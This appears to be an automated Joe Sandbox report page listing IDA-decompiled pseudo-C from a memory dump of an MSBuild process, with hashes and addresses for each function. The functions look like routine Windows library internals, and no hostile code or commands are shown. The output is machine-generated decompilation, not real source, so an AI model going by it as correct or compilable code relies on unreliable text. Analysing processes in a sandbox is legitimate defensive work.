                                            • Instruction ID: ef81778e7430d1fdc89e56a5677d4b684caa124fea41dcabee472fff08f24186
                                            • Opcode Fuzzy Hash: 500c4559b9dd26f8c36089d0dc6a4c29c36862d97c8e8571b3443ac451eb14ab
                                            • Instruction Fuzzy Hash: 114179B1D00209AFDB20DFAAD841BFEFBF8EF48714F14816AE994A7240DB759905CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 85%
                                            			E01005210(intOrPtr _a4, void* _a8) {
                                            				void* __ecx;
                                            				intOrPtr _t31;
                                            				signed int _t32;
                                            				signed int _t33;
                                            				intOrPtr _t35;
                                            				signed int _t52;
                                            				void* _t54;
                                            				void* _t56;
                                            				unsigned int _t59;
                                            				signed int _t60;
                                            				void* _t61;
                                            
                                            				_t61 = E010052A5(1);
                                            				if(_t61 == 0) {
                                            					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                            					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                                            					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                                            				} else {
                                            					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                                            					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                                            				}
                                            				_t60 = _t59 >> 1;
                                            				_t32 = 0x3a;
                                            				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                                            					_t52 = _t60 + _t60;
                                            					if(_a4 > _t52) {
                                            						goto L5;
                                            					}
                                            					if(_t61 != 0) {
                                            						asm("lock xadd [esi], eax");
                                            						if((_t32 | 0xffffffff) == 0) {
                                            							_push( *((intOrPtr*)(_t61 + 4)));
                                            							E010495D0();
                                            							L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                            						}
                                            					} else {
                                            						E0101EB70(_t54, 0x10f79a0);
                                            					}
                                            					_t26 = _t52 + 2; // 0xddeeddf0
                                            					return _t26;
                                            				} else {
                                            					_t52 = _t60 + _t60;
                                            					if(_a4 < _t52) {
                                            						if(_t61 != 0) {
                                            							asm("lock xadd [esi], eax");
                                            							if((_t32 | 0xffffffff) == 0) {
                                            								_push( *((intOrPtr*)(_t61 + 4)));
                                            								E010495D0();
                                            								L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                            							}
                                            						} else {
                                            							E0101EB70(_t54, 0x10f79a0);
                                            						}
                                            						return _t52;
                                            					}
                                            					L5:
                                            					_t33 = E0104F3E0(_a8, _t54, _t52);
                                            					if(_t61 == 0) {
                                            						E0101EB70(_t54, 0x10f79a0);
                                            					} else {
                                            						asm("lock xadd [esi], eax");
                                            						if((_t33 | 0xffffffff) == 0) {
                                            							_push( *((intOrPtr*)(_t61 + 4)));
                                            							E010495D0();
                                            							L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                            						}
                                            					}
                                            					_t35 = _a8;
                                            					if(_t60 <= 1) {
                                            						L9:
                                            						_t60 = _t60 - 1;
                                            						 *((short*)(_t52 + _t35 - 2)) = 0;
                                            						goto L10;
                                            					} else {
                                            						_t56 = 0x3a;
                                            						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                                            							 *((short*)(_t52 + _t35)) = 0;
                                            							L10:
                                            							return _t60 + _t60;
                                            						}
                                            						goto L9;
                                            					}
                                            				}
                                            			}














                                            0x01005220
                                            0x01005224
                                            0x01060d13
                                            0x01060d16
                                            0x01060d19
                                            0x0100522a
                                            0x0100522a
                                            0x0100522d
                                            0x0100522d
                                            0x01005231
                                            0x01005235
                                            0x01005239
                                            0x01060d5c
                                            0x01060d62
                                            0x00000000
                                            0x00000000
                                            0x01060d6a
                                            0x01060d7b
                                            0x01060d7f
                                            0x01060d81
                                            0x01060d84
                                            0x01060d95
                                            0x01060d95
                                            0x01060d6c
                                            0x01060d71
                                            0x01060d71
                                            0x01060d9a
                                            0x00000000
                                            0x0100524a
                                            0x0100524a
                                            0x01005250
                                            0x01060d24
                                            0x01060d35
                                            0x01060d39
                                            0x01060d3b
                                            0x01060d3e
                                            0x01060d50
                                            0x01060d50
                                            0x01060d26
                                            0x01060d2b
                                            0x01060d2b
                                            0x00000000
                                            0x01060d55
                                            0x01005256
                                            0x0100525b
                                            0x01005265
                                            0x01060da7
                                            0x0100526b
                                            0x0100526e
                                            0x01005272
                                            0x01060db1
                                            0x01060db4
                                            0x01060dc5
                                            0x01060dc5
                                            0x01005272
                                            0x01005278
                                            0x0100527e
                                            0x0100528a
                                            0x0100528c
                                            0x0100528d
                                            0x00000000
                                            0x01005280
                                            0x01005282
                                            0x01005288
                                            0x0100529f
                                            0x01005292
                                            0x00000000
                                            0x01005292
                                            0x00000000
                                            0x01005288
                                            0x0100527e

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e0b3925b124aca02bfc7e56299a95296ecf318382ae4ae9f5dc9f529f3384af0
                                            • Instruction ID: f34ee5933672b222f4a29d75444f3bb05a783216ecd98c63b770daccd7c9a13c
                                            • Opcode Fuzzy Hash: e0b3925b124aca02bfc7e56299a95296ecf318382ae4ae9f5dc9f529f3384af0
                                            • Instruction Fuzzy Hash: 6331F431681612EBD723AB18CC81BAE77A9FF71760F118729F9D50B5E4DB70E900CA91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E01043D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                            				intOrPtr _v8;
                                            				char _v12;
                                            				signed short** _t33;
                                            				short* _t38;
                                            				intOrPtr* _t39;
                                            				intOrPtr* _t41;
                                            				signed short _t43;
                                            				intOrPtr* _t47;
                                            				intOrPtr* _t53;
                                            				signed short _t57;
                                            				intOrPtr _t58;
                                            				signed short _t60;
                                            				signed short* _t61;
                                            
                                            				_t47 = __ecx;
                                            				_t61 = __edx;
                                            				_t60 = ( *__ecx & 0x0000ffff) + 2;
                                            				if(_t60 > 0xfffe) {
                                            					L22:
                                            					return 0xc0000106;
                                            				}
                                            				if(__edx != 0) {
                                            					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                                            						L5:
                                            						E01017B60(0, _t61, 0xfe11c4);
                                            						_v12 =  *_t47;
                                            						_v12 = _v12 + 0xfff8;
                                            						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                                            						E01017B60(0xfff8, _t61,  &_v12);
                                            						_t33 = _a8;
                                            						if(_t33 != 0) {
                                            							 *_t33 = _t61;
                                            						}
                                            						_t12 =  &(_t61[2]); // 0x100f0e0d
                                            						 *((short*)( *_t12 + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                                            						_t53 = _a12;
                                            						if(_t53 != 0) {
                                            							_t57 = _t61[2];
                                            							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                                            							while(_t38 >= _t57) {
                                            								if( *_t38 == 0x5c) {
                                            									_t41 = _t38 + 2;
                                            									if(_t41 == 0) {
                                            										break;
                                            									}
                                            									_t58 = 0;
                                            									if( *_t41 == 0) {
                                            										L19:
                                            										 *_t53 = _t58;
                                            										goto L7;
                                            									}
                                            									 *_t53 = _t41;
                                            									goto L7;
                                            								}
                                            								_t38 = _t38 - 2;
                                            							}
                                            							_t58 = 0;
                                            							goto L19;
                                            						} else {
                                            							L7:
                                            							_t39 = _a16;
                                            							if(_t39 != 0) {
                                            								 *_t39 = 0;
                                            								 *((intOrPtr*)(_t39 + 4)) = 0;
                                            								 *((intOrPtr*)(_t39 + 8)) = 0;
                                            								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                                            							}
                                            							return 0;
                                            						}
                                            					}
                                            					_t61 = _a4;
                                            					if(_t61 != 0) {
                                            						L3:
                                            						_t43 = L01024620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                                            						_t61[2] = _t43;
                                            						if(_t43 == 0) {
                                            							return 0xc0000017;
                                            						}
                                            						_t61[1] = _t60;
                                            						 *_t61 = 0;
                                            						goto L5;
                                            					}
                                            					goto L22;
                                            				}
                                            				_t61 = _a4;
                                            				if(_t61 == 0) {
                                            					return 0xc000000d;
                                            				}
                                            				goto L3;
                                            			}
















                                            0x01043d4c
                                            0x01043d50
                                            0x01043d55
                                            0x01043d5e
                                            0x0107e79a
                                            0x00000000
                                            0x0107e79a
                                            0x01043d68
                                            0x0107e789
                                            0x01043d9d
                                            0x01043da3
                                            0x01043daf
                                            0x01043db5
                                            0x01043dbc
                                            0x01043dc4
                                            0x01043dc9
                                            0x01043dce
                                            0x0107e7ae
                                            0x0107e7ae
                                            0x01043dd9
                                            0x01043dde
                                            0x01043de2
                                            0x01043de7
                                            0x01043e0d
                                            0x01043e13
                                            0x01043e16
                                            0x01043e1e
                                            0x01043e25
                                            0x01043e28
                                            0x00000000
                                            0x00000000
                                            0x01043e2a
                                            0x01043e2f
                                            0x01043e37
                                            0x01043e37
                                            0x00000000
                                            0x01043e37
                                            0x01043e31
                                            0x00000000
                                            0x01043e31
                                            0x01043e20
                                            0x01043e20
                                            0x01043e35
                                            0x00000000
                                            0x01043de9
                                            0x01043de9
                                            0x01043de9
                                            0x01043dee
                                            0x01043dfd
                                            0x01043dff
                                            0x01043e02
                                            0x01043e05
                                            0x01043e05
                                            0x00000000
                                            0x01043df0
                                            0x01043de7
                                            0x0107e78f
                                            0x0107e794
                                            0x01043d79
                                            0x01043d84
                                            0x01043d89
                                            0x01043d8e
                                            0x00000000
                                            0x0107e7a4
                                            0x01043d96
                                            0x01043d9a
                                            0x00000000
                                            0x01043d9a
                                            0x00000000
                                            0x0107e794
                                            0x01043d6e
                                            0x01043d73
                                            0x00000000
                                            0x0107e7b5
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d57256685cbece279e175d3aef7f96f3dc730e58117f39bc72eba63658421c70
                                            • Instruction ID: d4e7d3eae51102b2b4d8f3ba819e1052c75da86c960b2e2ef8a88f11f0bc913b
                                            • Opcode Fuzzy Hash: d57256685cbece279e175d3aef7f96f3dc730e58117f39bc72eba63658421c70
                                            • Instruction Fuzzy Hash: E4318DB1A016259BD7259F2ED481A6ABBE5FF4571070580BAE9C6CF290E730D840C791
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 78%
                                            			E0103A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                            				intOrPtr _t35;
                                            				intOrPtr _t39;
                                            				intOrPtr _t45;
                                            				intOrPtr* _t51;
                                            				intOrPtr* _t52;
                                            				intOrPtr* _t55;
                                            				signed int _t57;
                                            				intOrPtr* _t59;
                                            				intOrPtr _t68;
                                            				intOrPtr* _t77;
                                            				void* _t79;
                                            				signed int _t80;
                                            				intOrPtr _t81;
                                            				char* _t82;
                                            				void* _t83;
                                            
                                            				_push(0x24);
                                            				_push(0x10e0220);
                                            				E0105D08C(__ebx, __edi, __esi);
                                            				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                                            				_t79 = __ecx;
                                            				_t35 =  *0x10f7b9c; // 0x0
                                            				_t55 = L01024620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                                            				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                                            				if(_t55 == 0) {
                                            					_t39 = 0xc0000017;
                                            					L11:
                                            					return E0105D0D1(_t39);
                                            				}
                                            				_t68 = 0;
                                            				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                                            				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                                            				_t7 = _t55 + 8; // 0x8
                                            				_t57 = 6;
                                            				memcpy(_t7, _t79, _t57 << 2);
                                            				_t80 = 0xfffffffe;
                                            				 *(_t83 - 4) = _t80;
                                            				if(0 < 0) {
                                            					L14:
                                            					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                            					L20:
                                            					L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                                            					_t39 = _t81;
                                            					goto L11;
                                            				}
                                            				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                                            					_t81 = 0xc000007b;
                                            					goto L20;
                                            				}
                                            				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                                            					_t59 =  *((intOrPtr*)(_t83 + 8));
                                            					_t45 =  *_t59;
                                            					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                                            					 *_t59 = _t45 + 1;
                                            					L6:
                                            					 *(_t83 - 4) = 1;
                                            					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                                            					 *(_t83 - 4) = _t80;
                                            					if(_t68 < 0) {
                                            						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                                            						if(_t82 == 0) {
                                            							goto L14;
                                            						}
                                            						asm("btr eax, ecx");
                                            						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                            						if( *_t82 != 0) {
                                            							 *0x10f7b10 =  *0x10f7b10 - 8;
                                            						}
                                            						goto L20;
                                            					}
                                            					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                                            					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                                            					_t51 =  *0x10f536c; // 0x771a5368
                                            					if( *_t51 != 0x10f5368) {
                                            						_push(3);
                                            						asm("int 0x29");
                                            						goto L14;
                                            					}
                                            					 *_t55 = 0x10f5368;
                                            					 *((intOrPtr*)(_t55 + 4)) = _t51;
                                            					 *_t51 = _t55;
                                            					 *0x10f536c = _t55;
                                            					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                                            					if(_t52 != 0) {
                                            						 *_t52 = _t55;
                                            					}
                                            					_t39 = 0;
                                            					goto L11;
                                            				}
                                            				_t77 =  *((intOrPtr*)(_t83 + 8));
                                            				_t68 = E0103A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                                            				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                                            				if(_t68 < 0) {
                                            					goto L14;
                                            				}
                                            				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                                            				goto L6;
                                            			}


















                                            0x0103a61c
                                            0x0103a61e
                                            0x0103a623
                                            0x0103a628
                                            0x0103a62b
                                            0x0103a62d
                                            0x0103a648
                                            0x0103a64a
                                            0x0103a64f
                                            0x01079b44
                                            0x0103a6ec
                                            0x0103a6f1
                                            0x0103a6f1
                                            0x0103a655
                                            0x0103a657
                                            0x0103a65a
                                            0x0103a65d
                                            0x0103a662
                                            0x0103a663
                                            0x0103a667
                                            0x0103a668
                                            0x0103a66d
                                            0x0103a706
                                            0x0103a706
                                            0x01079bda
                                            0x01079be6
                                            0x01079beb
                                            0x00000000
                                            0x01079beb
                                            0x0103a679
                                            0x01079b7a
                                            0x00000000
                                            0x01079b7a
                                            0x0103a683
                                            0x0103a6f4
                                            0x0103a6f7
                                            0x0103a6f9
                                            0x0103a6fd
                                            0x0103a6a0
                                            0x0103a6a0
                                            0x0103a6ad
                                            0x0103a6af
                                            0x0103a6b4
                                            0x01079ba7
                                            0x01079bac
                                            0x00000000
                                            0x00000000
                                            0x01079bc6
                                            0x01079bce
                                            0x01079bd1
                                            0x01079bd3
                                            0x01079bd3
                                            0x00000000
                                            0x01079bd1
                                            0x0103a6bd
                                            0x0103a6c3
                                            0x0103a6c6
                                            0x0103a6d2
                                            0x0103a701
                                            0x0103a704
                                            0x00000000
                                            0x0103a704
                                            0x0103a6d4
                                            0x0103a6d6
                                            0x0103a6d9
                                            0x0103a6db
                                            0x0103a6e1
                                            0x0103a6e6
                                            0x0103a6e8
                                            0x0103a6e8
                                            0x0103a6ea
                                            0x00000000
                                            0x0103a6ea
                                            0x0103a688
                                            0x0103a692
                                            0x0103a694
                                            0x0103a699
                                            0x00000000
                                            0x00000000
                                            0x0103a69d
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: aa6957a47311605f10de27210c7b4641ce5d01d49cad447be968b0b0d75314d2
                                            • Instruction ID: 04af2a1e3bc84d96aa42d21ea8e1f33a976570a34da671ba2f37736ed7d5696a
                                            • Opcode Fuzzy Hash: aa6957a47311605f10de27210c7b4641ce5d01d49cad447be968b0b0d75314d2
                                            • Instruction Fuzzy Hash: F04159B5B00209DFCB15CF58C990BA9BBF5FB89314F1580ADE985EB344C779A901CB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 68%
                                            			E0102C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                                            				signed int* _v8;
                                            				char _v16;
                                            				void* __ebx;
                                            				void* __edi;
                                            				signed char _t33;
                                            				signed char _t43;
                                            				signed char _t48;
                                            				signed char _t62;
                                            				void* _t63;
                                            				intOrPtr _t69;
                                            				intOrPtr _t71;
                                            				unsigned int* _t82;
                                            				void* _t83;
                                            
                                            				_t80 = __ecx;
                                            				_t82 = __edx;
                                            				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                                            				_t62 = _t33 >> 0x00000001 & 0x00000001;
                                            				if((_t33 & 0x00000001) != 0) {
                                            					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                                            					if(E01027D50() != 0) {
                                            						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            					} else {
                                            						_t43 = 0x7ffe0386;
                                            					}
                                            					if( *_t43 != 0) {
                                            						_t43 = E010D8D34(_v8, _t80);
                                            					}
                                            					E01022280(_t43, _t82);
                                            					if( *((char*)(_t80 + 0xdc)) == 0) {
                                            						E0101FFB0(_t62, _t80, _t82);
                                            						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                                            						_t30 = _t80 + 0xd0; // 0xd0
                                            						_t83 = _t30;
                                            						E010D8833(_t83,  &_v16);
                                            						_t81 = _t80 + 0x90;
                                            						E0101FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                                            						_t63 = 0;
                                            						_push(0);
                                            						_push(_t83);
                                            						_t48 = E0104B180();
                                            						if(_a4 != 0) {
                                            							E01022280(_t48, _t81);
                                            						}
                                            					} else {
                                            						_t69 = _v8;
                                            						_t12 = _t80 + 0x98; // 0x98
                                            						_t13 = _t69 + 0xc; // 0x575651ff
                                            						E0102BB2D(_t13, _t12);
                                            						_t71 = _v8;
                                            						_t15 = _t80 + 0xb0; // 0xb0
                                            						_t16 = _t71 + 8; // 0x8b000cc2
                                            						E0102BB2D(_t16, _t15);
                                            						E0102B944(_v8, _t62);
                                            						 *((char*)(_t80 + 0xdc)) = 0;
                                            						E0101FFB0(0, _t80, _t82);
                                            						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                                            						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                                            						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                                            						 *(_t80 + 0xde) = 0;
                                            						if(_a4 == 0) {
                                            							_t25 = _t80 + 0x90; // 0x90
                                            							E0101FFB0(0, _t80, _t25);
                                            						}
                                            						_t63 = 1;
                                            					}
                                            					return _t63;
                                            				}
                                            				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                                            				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                                            				if(_a4 == 0) {
                                            					_t24 = _t80 + 0x90; // 0x90
                                            					E0101FFB0(0, __ecx, _t24);
                                            				}
                                            				return 0;
                                            			}
















                                            0x0102c18d
                                            0x0102c18f
                                            0x0102c191
                                            0x0102c19b
                                            0x0102c1a0
                                            0x0102c1d4
                                            0x0102c1de
                                            0x01072d6e
                                            0x0102c1e4
                                            0x0102c1e4
                                            0x0102c1e4
                                            0x0102c1ec
                                            0x01072d7d
                                            0x01072d7d
                                            0x0102c1f3
                                            0x0102c1ff
                                            0x01072d88
                                            0x01072d8d
                                            0x01072d94
                                            0x01072d94
                                            0x01072d9f
                                            0x01072da4
                                            0x01072dab
                                            0x01072db0
                                            0x01072db2
                                            0x01072db3
                                            0x01072db4
                                            0x01072dbc
                                            0x01072dc3
                                            0x01072dc3
                                            0x0102c205
                                            0x0102c205
                                            0x0102c208
                                            0x0102c20e
                                            0x0102c211
                                            0x0102c216
                                            0x0102c219
                                            0x0102c21f
                                            0x0102c222
                                            0x0102c22c
                                            0x0102c234
                                            0x0102c23a
                                            0x0102c23f
                                            0x0102c245
                                            0x0102c24b
                                            0x0102c251
                                            0x0102c25a
                                            0x0102c276
                                            0x0102c27d
                                            0x0102c27d
                                            0x0102c25c
                                            0x0102c25c
                                            0x00000000
                                            0x0102c25e
                                            0x0102c1a4
                                            0x0102c1aa
                                            0x0102c1b3
                                            0x0102c265
                                            0x0102c26c
                                            0x0102c26c
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                            • Instruction ID: 51237a6ce6411c159bc9271a2a9a535171166325c9338e8d538e7181fb98b89d
                                            • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                            • Instruction Fuzzy Hash: 72314871A01697BEE705EBB4C580BEDFBA4BF53204F14415AC49C47201DB786A49C7E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 76%
                                            			E01087016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                                            				signed int _v8;
                                            				char _v588;
                                            				intOrPtr _v592;
                                            				intOrPtr _v596;
                                            				signed short* _v600;
                                            				char _v604;
                                            				short _v606;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed short* _t55;
                                            				void* _t56;
                                            				signed short* _t58;
                                            				signed char* _t61;
                                            				char* _t68;
                                            				void* _t69;
                                            				void* _t71;
                                            				void* _t72;
                                            				signed int _t75;
                                            
                                            				_t64 = __edx;
                                            				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                                            				_v8 =  *0x10fd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                                            				_t55 = _a16;
                                            				_v606 = __ecx;
                                            				_t71 = 0;
                                            				_t58 = _a12;
                                            				_v596 = __edx;
                                            				_v600 = _t58;
                                            				_t68 =  &_v588;
                                            				if(_t58 != 0) {
                                            					_t71 = ( *_t58 & 0x0000ffff) + 2;
                                            					if(_t55 != 0) {
                                            						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                                            					}
                                            				}
                                            				_t8 = _t71 + 0x2a; // 0x28
                                            				_t33 = _t8;
                                            				_v592 = _t8;
                                            				if(_t71 <= 0x214) {
                                            					L6:
                                            					 *((short*)(_t68 + 6)) = _v606;
                                            					if(_t64 != 0xffffffff) {
                                            						asm("cdq");
                                            						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                                            						 *((char*)(_t68 + 0x28)) = _a4;
                                            						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                                            						 *((char*)(_t68 + 0x29)) = _a8;
                                            						if(_t71 != 0) {
                                            							_t22 = _t68 + 0x2a; // 0x2a
                                            							_t64 = _t22;
                                            							E01086B4C(_t58, _t22, _t71,  &_v604);
                                            							if(_t55 != 0) {
                                            								_t25 = _v604 + 0x2a; // 0x2a
                                            								_t64 = _t25 + _t68;
                                            								E01086B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                                            							}
                                            							if(E01027D50() == 0) {
                                            								_t61 = 0x7ffe0384;
                                            							} else {
                                            								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                            							}
                                            							_push(_t68);
                                            							_push(_v592 + 0xffffffe0);
                                            							_push(0x402);
                                            							_push( *_t61 & 0x000000ff);
                                            							E01049AE0();
                                            						}
                                            					}
                                            					_t35 =  &_v588;
                                            					if( &_v588 != _t68) {
                                            						_t35 = L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                                            					}
                                            					L16:
                                            					_pop(_t69);
                                            					_pop(_t72);
                                            					_pop(_t56);
                                            					return E0104B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                                            				}
                                            				_t68 = L01024620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                                            				if(_t68 == 0) {
                                            					goto L16;
                                            				} else {
                                            					_t58 = _v600;
                                            					_t64 = _v596;
                                            					goto L6;
                                            				}
                                            			}






















                                            0x01087016
                                            0x0108701e
                                            0x0108702b
                                            0x01087033
                                            0x01087037
                                            0x0108703c
                                            0x0108703e
                                            0x01087041
                                            0x01087045
                                            0x0108704a
                                            0x01087050
                                            0x01087055
                                            0x0108705a
                                            0x01087062
                                            0x01087062
                                            0x0108705a
                                            0x01087064
                                            0x01087064
                                            0x01087067
                                            0x01087071
                                            0x01087096
                                            0x0108709b
                                            0x010870a2
                                            0x010870a6
                                            0x010870a7
                                            0x010870ad
                                            0x010870b3
                                            0x010870b6
                                            0x010870bb
                                            0x010870c3
                                            0x010870c3
                                            0x010870c6
                                            0x010870cd
                                            0x010870dd
                                            0x010870e0
                                            0x010870e2
                                            0x010870e2
                                            0x010870ee
                                            0x01087101
                                            0x010870f0
                                            0x010870f9
                                            0x010870f9
                                            0x0108710a
                                            0x0108710e
                                            0x01087112
                                            0x01087117
                                            0x01087118
                                            0x01087118
                                            0x010870bb
                                            0x0108711d
                                            0x01087123
                                            0x01087131
                                            0x01087131
                                            0x01087136
                                            0x0108713d
                                            0x0108713e
                                            0x0108713f
                                            0x0108714a
                                            0x0108714a
                                            0x01087084
                                            0x01087088
                                            0x00000000
                                            0x0108708e
                                            0x0108708e
                                            0x01087092
                                            0x00000000
                                            0x01087092

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7c2b4e1f0781a484fc3efbb8eb5c8a20fd501dc194c434a485dfec1d232e9131
                                            • Instruction ID: 790d8835b9a30aadd13d769e5864baa5e896851204221ffaf0153b16a17be71f
                                            • Opcode Fuzzy Hash: 7c2b4e1f0781a484fc3efbb8eb5c8a20fd501dc194c434a485dfec1d232e9131
                                            • Instruction Fuzzy Hash: 0F31C6726087519BC720EF2CC840AAAB7E5FF98700F144A69F9D587795E730E904CBA6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 70%
                                            			E010B3D40(intOrPtr __ecx, char* __edx) {
                                            				signed int _v8;
                                            				char* _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				signed char _v24;
                                            				char _v28;
                                            				char _v29;
                                            				intOrPtr* _v32;
                                            				char _v36;
                                            				char _v37;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed char _t34;
                                            				intOrPtr* _t37;
                                            				intOrPtr* _t42;
                                            				intOrPtr* _t47;
                                            				intOrPtr* _t48;
                                            				intOrPtr* _t49;
                                            				char _t51;
                                            				void* _t52;
                                            				intOrPtr* _t53;
                                            				char* _t55;
                                            				char _t59;
                                            				char* _t61;
                                            				intOrPtr* _t64;
                                            				void* _t65;
                                            				char* _t67;
                                            				void* _t68;
                                            				signed int _t70;
                                            
                                            				_t62 = __edx;
                                            				_t72 = (_t70 & 0xfffffff8) - 0x1c;
                                            				_v8 =  *0x10fd360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
                                            				_t34 =  &_v28;
                                            				_v20 = __ecx;
                                            				_t67 = __edx;
                                            				_v24 = _t34;
                                            				_t51 = 0;
                                            				_v12 = __edx;
                                            				_v29 = 0;
                                            				_v28 = _t34;
                                            				E01022280(_t34, 0x10f8a6c);
                                            				_t64 =  *0x10f5768; // 0x771a5768
                                            				if(_t64 != 0x10f5768) {
                                            					while(1) {
                                            						_t8 = _t64 + 8; // 0x771a5770
                                            						_t42 = _t8;
                                            						_t53 = _t64;
                                            						 *_t42 =  *_t42 + 1;
                                            						_v16 = _t42;
                                            						E0101FFB0(_t53, _t64, 0x10f8a6c);
                                            						 *0x10fb1e0(_v24, _t67);
                                            						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
                                            							_v37 = 1;
                                            						}
                                            						E01022280(_t45, 0x10f8a6c);
                                            						_t47 = _v28;
                                            						_t64 =  *_t64;
